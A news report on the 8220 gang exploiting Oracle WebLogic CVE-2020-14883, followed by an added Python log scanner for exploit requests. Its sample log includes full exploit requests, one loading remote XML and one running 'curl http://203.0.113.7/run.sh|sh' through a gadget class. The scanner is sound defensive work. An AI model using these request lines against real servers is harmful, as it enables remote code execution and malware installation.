The 8220 gang has been leveraging an old Oracle WebLogic Server vulnerability to distribute malware, the Imperva Threat Research team has found.
Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities.
Earlier this year, Trend Micro researchers revealed that the 8220 gang had been exploiting CVE-2017-3506, another vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware, to take control of targeted systems and install cryptominers.
This time around, the gang has been exploiting CVE-2020-14883, a remote code execution vulnerability in the Oracle WebLogic Server administration console. On its own the flaw requires access to the console, so in practice it is chained with a separate authentication bypass for the same console, which is why a WebLogic console exposed to the internet is the precondition for this campaign.
Once the exploit lands, the attackers make the server fetch attacker-hosted, maliciously crafted XML files; parsing those files executes the commands embedded in them, which in turn download and run stealer and cryptominer malware. The signals to hunt for are therefore a WebLogic host fetching XML from an unfamiliar external address and the WebLogic process spawning a shell or a downloader.
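As an added example (not code from the original article or from Imperva), the following Python scans WebLogic HTTP access-log lines for the request shape used by the publicly published proofs of concept for CVE-2020-14883: a double-URL-encoded path that resolves to console.portal, and a `handle=` parameter naming one of the two gadget classes those proofs of concept use (`FileSystemXmlApplicationContext`, which loads a remote XML file, and `ShellSession`, which evaluates an expression). The log lines are constructed for this example; the gadget-class list and the assumption that your exploit traffic looks like the public PoC, rather than like the 8220 gang's exact requests, are this example's, not the article's.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format), not from the campaign.
# Line 2 and 3 mimic public CVE-2020-14883 PoC requests; 1 and 4 are benign console use.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2023:13:10:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120
203.0.113.7 - - [20/Dec/2023:13:10:07 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://203.0.113.7/x.xml%22) HTTP/1.1" 200 1234
203.0.113.7 - - [20/Dec/2023:13:10:12 +0000] "POST /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec('curl%20http://203.0.113.7/run.sh|sh')%22) HTTP/1.1" 200 1234
10.0.0.9 - - [20/Dec/2023:13:11:40 +0000] "GET /console/css/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Gadget classes named in the public PoC requests for this CVE (assumption: your
# attacker uses the same handle classes; other gadgets would need adding here).
GADGET_CLASSES = ("FileSystemXmlApplicationContext", "ShellSession")

# Remote resource referenced inside the handle value (the XML or script to fetch).
URL_RE = re.compile(r'https?://[^\s"\'()|]+')


def analyse_request(target):
    """Return a list of (rule, detail) findings for one request target; [] if benign."""
    findings = []
    # The PoC double-encodes the traversal (%252e -> %2e -> .) so the web tier's
    # single decode leaves it intact; decode twice to see what the console sees.
    decoded = unquote(unquote(target))
    parts = urlsplit(decoded)
    path = parts.path
    if not path.startswith("/console/"):
        return findings

    # Rule 1: a '..' segment inside the console path (/console/css/../console.portal).
    if ".." in path.split("/"):
        findings.append(("console_path_traversal", path))

    # Rule 2: handle= names a known gadget class; pull out the remote URL it loads.
    handle = parse_qs(parts.query).get("handle", [""])[0]
    for cls in GADGET_CLASSES:
        if cls in handle:
            urls = URL_RE.findall(handle)
            findings.append(("console_handle_gadget",
                             f"{cls} -> {urls[0] if urls else '(no url)'}"))
    return findings


def scan_log(text):
    """Scan access-log text and return one alert dict per finding."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        for rule, detail in analyse_request(m["target"]):
            alerts.append({
                "line": lineno,
                "src": m["src"],
                "status": int(m["status"]),
                "rule": rule,
                "detail": detail,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Running it on the constructed log flags only lines 2 and 3, each twice (traversal plus gadget), and extracts `http://203.0.113.7/x.xml` and `http://203.0.113.7/run.sh` as the remote files to block and pivot on. A 200 status on such a request is the point to escalate: it means the console accepted the handle, and the next thing to check is outbound traffic from that WebLogic host and child processes of its Java process.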
This Cyber News was published on www.helpnetsecurity.com. Publication date: Wed, 20 Dec 2023 13:13:08 +0000